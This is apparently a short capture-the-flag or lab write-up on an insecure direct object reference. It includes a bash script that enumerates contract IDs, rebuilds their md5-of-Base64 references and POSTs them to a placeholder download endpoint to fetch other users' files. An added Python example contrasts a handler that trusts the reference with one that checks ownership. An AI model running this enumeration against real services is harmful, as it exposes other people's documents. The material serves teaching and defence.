Bypassing Encoded References

for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done

#!/bin/bash

for i in {1..10}; do
    for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
        curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
    done
done

As we can see in the page source of the website:

It converts the contract ID to Base64 and then URL-encodes the result.

See the payload:

Intercept the request.

It is a GET request.

First I tried replicating the payload

Then I created a bash script

Just execute the bash script
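The server-side view of why the encoded reference gives no protection, as an added example that is not code from the original page or from the target application: the reference is rebuilt exactly as in the one-liner above (md5 of the Base64 of the ID), then a handler that trusts it is compared with one that checks ownership. The contract table, user IDs, key and function names are all constructed assumptions.

```python
import base64
import hashlib
import hmac

# Constructed sample data: contract id -> (owner user id, file name).
CONTRACTS = {1: (1, "contract_1.pdf"), 2: (2, "contract_2.pdf"), 3: (3, "contract_3.pdf")}
SERVER_KEY = b"constructed-demo-key"  # assumption: secret kept server-side only


def encoded_ref(contract_id: int) -> str:
    """Reference as built by the page's one-liner: md5(base64(id))."""
    b64 = base64.b64encode(str(contract_id).encode())
    return hashlib.md5(b64).hexdigest()


# Anyone can rebuild this table, so the encoded reference hides nothing.
REF_TO_ID = {encoded_ref(cid): cid for cid in CONTRACTS}


def download_unchecked(ref: str) -> str:
    """Weak handler: trusts the reference and never asks who is calling."""
    return CONTRACTS[REF_TO_ID[ref]][1]


def download_checked(session_user: int, ref: str) -> str:
    """Hardened handler: resolve the reference, then enforce ownership."""
    cid = REF_TO_ID.get(ref)
    if cid is None or CONTRACTS[cid][0] != session_user:
        # Same error for "missing" and "not yours" to avoid an existence oracle.
        raise PermissionError("contract not available")
    return CONTRACTS[cid][1]


def keyed_ref(session_user: int, contract_id: int) -> str:
    """Optional hardening: a reference bound to the user with a server key."""
    msg = f"{session_user}:{contract_id}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def verify_keyed_ref(session_user: int, contract_id: int, ref: str) -> bool:
    """Constant-time check that a keyed reference belongs to this user and id."""
    return hmac.compare_digest(keyed_ref(session_user, contract_id), ref)
```

The ownership check is the actual fix; the keyed reference only removes predictability and should not replace it.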
